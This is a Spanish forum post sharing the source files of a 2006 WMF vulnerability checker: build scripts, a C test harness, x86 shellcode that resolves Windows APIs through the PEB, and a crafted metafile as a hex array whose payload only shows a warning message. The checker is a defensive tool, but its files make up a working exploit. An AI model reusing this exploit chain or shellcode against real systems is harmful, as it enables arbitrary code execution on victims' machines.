a ver si les sirve de algo los archivos del test de Ilfak Guilfanov, quiza les de una idea.El test tiene siete archivos, dos bat:
@echo off
rem this batch file builds a program to test for the vulnerability
cl -IC:\PROGRA~1\MIAF9D~1\VC98\INCLUDE\ /O2 /GS- wmf_checker_hexblog.cpp /link /subsystem:windows kernel32.lib /entry:WinMain /include:_copyr
@echo off
rem this batch builds a WMF file which uses to vulnerability
rem to display a message on the screen
tasm32 /m5 tell.asm
ulink tell.obj
bcopy tell.exe wmf_tail.wmf 0x200
copy /b wmfhdr.wmf+wmf_tail.wmf wmf_tester.wmf
del wmf_tail.wmf
bin2c wmf_tester.wmf wmfdata.cpp
un archivo en C
#include <stdio.h>
#include <windows.h>
#pragma comment(lib, "gdi32.lib")
#pragma comment(lib, "user32.lib")
typedef BYTE uchar;
#include "wmfdata.cpp"
//---------------------------------------------------------------------------
extern "C" const char copyr[] = "Copyright 2006 by Ilfak Guilfanov, ig@hexblog.com\0"
"http://www.hexblog.com";
static char tmp_name[MAX_PATH];
//---------------------------------------------------------------------------
void error(const char *message)
{
MessageBox(NULL, message, NULL, MB_OK);
ExitProcess(1);
}
//---------------------------------------------------------------------------
int WINAPI WinMain(HINSTANCE, HINSTANCE, LPSTR, int)
{
MessageBox(NULL,
"This program checks your system against the WMF vulnerability.\n"
"\n"
"It does not do anything harmful to your computer and does not\n"
"alter any files on it.\n"
"\n"
"When you press OK, the test results will be displayed on the screen.\n"
"\n"
"Copyright 2006 by Ilfak Guilfanov, http://www.hexblog.com",
"WMF Vulnerability Checker v1.1",
MB_OK);
char path[1024];
GetTempPath(sizeof(path), path);
HMETAFILE h = SetMetaFileBitsEx(sizeof(array), (BYTE*)array);
if ( h == NULL )
error("ERROR: could not create metafile");
RECT Rect; // rendering rectangle, anything will do
Rect.left = 0;
Rect.top = 0;
Rect.bottom = 500;
Rect.right = 500;
GetTempFileName(path, "ig", 0, tmp_name);
HDC DC = CreateEnhMetaFile(NULL, tmp_name, &Rect, "Sample WMF");
// PlayMetaFile crashes in the case of vulnerability
PlayMetaFile(DC, h);
DeleteFile(tmp_name);
MessageBox(NULL,
"You system seems to be invulnerable to the WMF exploit.\n"
"\n"
"Please note that this program tries only one WMF exploit.\n"
"In theory other vulnerabilities and exploits are possible,\n"
"so stay vigilant and update your systems frequently!",
"No vulnerability has been detected",
MB_OK);
return 0;
}
otro ASM
.386
.model flat
.code
rpush macro xxx
mov ecx, offset xxx - offset L
add ecx, ebp
push ecx
endm
endp
start:
call L
L:
pop ebp
call qGetKernel32Handle
mov ebx, eax
rpush aLoadLibrary
push ebx
call qGetProcAddress
rpush aUser32
call eax
rpush aMessageBox
push eax
call qGetProcAddress
push 0
push 0
rpush message
push 0
call eax ; MessageBox
rpush aExitProcess
push ebx
call qGetProcAddress
push 1
call eax ; ExitProcess
qGetKernel32Handle proc near
xor eax, eax
mov eax, fs:[eax+30h]
test eax, eax
js short loc_169067
push esi
mov eax, [eax+0Ch]
mov esi, [eax+1Ch]
lodsd
mov eax, [eax+8]
pop esi
retn
loc_169067:
mov eax, [eax+34h]
add eax, 7Ch
mov eax, [eax+3Ch]
retn
qGetKernel32Handle endp
qGetProcAddress proc near ; CODE XREF: debug007:001690C3�p
var_4= dword ptr -4
arg_0= dword ptr 4 ; library handle
arg_4= dword ptr 8 ; function name
xor eax, eax
pusha
mov ebp, [esp+20h+arg_0] ; kernel32 handle
mov eax, [ebp+3Ch]
mov edi, [ebp+eax+78h]
add edi, ebp
mov ecx, [edi+18h]
mov ebx, [edi+20h]
add ebx, ebp
nameloop:
jecxz short failed
dec ecx
mov esi, [ebx+ecx*4]
add esi, ebp
push esi
push [esp+24h+arg_4]
call strcmp
test eax, eax
jnz short nameloop
mov ebx, [edi+24h]
add ebx, ebp
mov cx, [ebx+ecx*2]
mov ebx, [edi+1Ch]
add ebx, ebp
mov eax, [ebx+ecx*4]
add eax, ebp
mov [esp+20h+var_4], eax
failed:
popa
retn
qGetProcAddress endp
strcmp proc near
arg_0= dword ptr 8
arg_4= dword ptr 12
push ebp
mov ebp, esp
push esi
push edi
push ebx
mov esi, [ebp+arg_0]
mov edi, [ebp+arg_4]
xor eax, eax
charloop:
mov al, [esi]
mov bl, [edi]
inc esi
inc edi
sub al, bl
jnz fret
test bl, bl
jnz charloop
fret:
pop ebx
pop edi
pop esi
pop ebp
ret 8
strcmp endp
aMessageBox db 'MessageBoxA', 0
aExitProcess db 'ExitProcess', 0
aLoadLibrary db 'LoadLibraryA', 0
aUser32 db 'user32.dll', 0
message db 'Your system is vulnerable to WMF exploits!', 0Ah
db 0Ah
db 'Please visit http://www.hexblog.com and install the hotfix!', 0
copyr db 'WMF Vulnerability test file by Ilfak Guilfanov', 0
align 4
; last record in the file
dd 3
dw 0
end start
luego este:
static uchar array[] = {
0x01,0x00,0x09,0x00,0x00,0x03,0xE5,0x00,0x00,0x00,0x06,0x00,0x3D,0x00,0x00,0x00,
0x00,0x00,0x11,0x00,0x00,0x00,0x26,0x06,0x09,0x00,0x16,0x00,0xE8,0x00,0x00,0x00,
0x00,0x5D,0xE8,0x4A,0x00,0x00,0x00,0x8B,0xD8,0xB9,0xF3,0x00,0x00,0x00,0x03,0xCD,
0x51,0x53,0xE8,0x5B,0x00,0x00,0x00,0xB9,0x00,0x01,0x00,0x00,0x03,0xCD,0x51,0xFF,
0xD0,0xB9,0xDB,0x00,0x00,0x00,0x03,0xCD,0x51,0x50,0xE8,0x43,0x00,0x00,0x00,0x6A,
0x00,0x6A,0x00,0xB9,0x0B,0x01,0x00,0x00,0x03,0xCD,0x51,0x6A,0x00,0xFF,0xD0,0xB9,
0xE7,0x00,0x00,0x00,0x03,0xCD,0x51,0x53,0xE8,0x25,0x00,0x00,0x00,0x6A,0x01,0xFF,
0xD0,0x33,0xC0,0x64,0x8B,0x40,0x30,0x85,0xC0,0x78,0x0D,0x56,0x8B,0x40,0x0C,0x8B,
0x70,0x1C,0xAD,0x8B,0x40,0x08,0x5E,0xC3,0x8B,0x40,0x34,0x83,0xC0,0x7C,0x8B,0x40,
0x3C,0xC3,0x33,0xC0,0x60,0x8B,0x6C,0x24,0x24,0x8B,0x45,0x3C,0x8B,0x7C,0x05,0x78,
0x03,0xFD,0x8B,0x4F,0x18,0x8B,0x5F,0x20,0x03,0xDD,0xE3,0x2B,0x49,0x8B,0x34,0x8B,
0x03,0xF5,0x56,0xFF,0x74,0x24,0x2C,0xE8,0x1D,0x00,0x00,0x00,0x85,0xC0,0x75,0xEA,
0x8B,0x5F,0x24,0x03,0xDD,0x66,0x8B,0x0C,0x4B,0x8B,0x5F,0x1C,0x03,0xDD,0x8B,0x04,
0x8B,0x03,0xC5,0x89,0x44,0x24,0x1C,0x61,0xC3,0x55,0x8B,0xEC,0x56,0x57,0x53,0x8B,
0x75,0x08,0x8B,0x7D,0x0C,0x33,0xC0,0x8A,0x06,0x8A,0x1F,0x46,0x47,0x2A,0xC3,0x75,
0x04,0x84,0xDB,0x75,0xF2,0x5B,0x5F,0x5E,0x5D,0xC2,0x08,0x00,0x4D,0x65,0x73,0x73,
0x61,0x67,0x65,0x42,0x6F,0x78,0x41,0x00,0x45,0x78,0x69,0x74,0x50,0x72,0x6F,0x63,
0x65,0x73,0x73,0x00,0x4C,0x6F,0x61,0x64,0x4C,0x69,0x62,0x72,0x61,0x72,0x79,0x41,
0x00,0x75,0x73,0x65,0x72,0x33,0x32,0x2E,0x64,0x6C,0x6C,0x00,0x59,0x6F,0x75,0x72,
0x20,0x73,0x79,0x73,0x74,0x65,0x6D,0x20,0x69,0x73,0x20,0x76,0x75,0x6C,0x6E,0x65,
0x72,0x61,0x62,0x6C,0x65,0x20,0x74,0x6F,0x20,0x57,0x4D,0x46,0x20,0x65,0x78,0x70,
0x6C,0x6F,0x69,0x74,0x73,0x21,0x0A,0x0A,0x50,0x6C,0x65,0x61,0x73,0x65,0x20,0x76,
0x69,0x73,0x69,0x74,0x20,0x68,0x74,0x74,0x70,0x3A,0x2F,0x2F,0x77,0x77,0x77,0x2E,
0x68,0x65,0x78,0x62,0x6C,0x6F,0x67,0x2E,0x63,0x6F,0x6D,0x20,0x61,0x6E,0x64,0x20,
0x69,0x6E,0x73,0x74,0x61,0x6C,0x6C,0x20,0x74,0x68,0x65,0x20,0x68,0x6F,0x74,0x66,
0x69,0x78,0x21,0x00,0x57,0x4D,0x46,0x20,0x56,0x75,0x6C,0x6E,0x65,0x72,0x61,0x62,
0x69,0x6C,0x69,0x74,0x79,0x20,0x74,0x65,0x73,0x74,0x20,0x66,0x69,0x6C,0x65,0x20,
0x62,0x79,0x20,0x49,0x6C,0x66,0x61,0x6B,0x20,0x47,0x75,0x69,0x6C,0x66,0x61,0x6E,
0x6F,0x76,0x00,0x90,0x03,0x00,0x00,0x00,0x00,0x00};
y por ultimo dos imagenes WMF
espero les sirva de ayuda para tener un mejor panorama
Salu2
PD:cuando ejecute el test en mi maquina, obviamente me aparecio el dialogo de que soy vulnerable, y la pantalla se puso negra, intente ver si habia algun proceso corriendo para matarlo, pero este no existia, lo que me obligo a resetear el sistema.Luego de reiniciado, nuevamente ¨sos vulnerable¨y a resetear de nuevo, por lo que me vi obligado a renombrar los archivos anteriores para que no se sigan ejecutando
Autor
En línea
)
) registros WMF, que son simples puntos aleatorios...
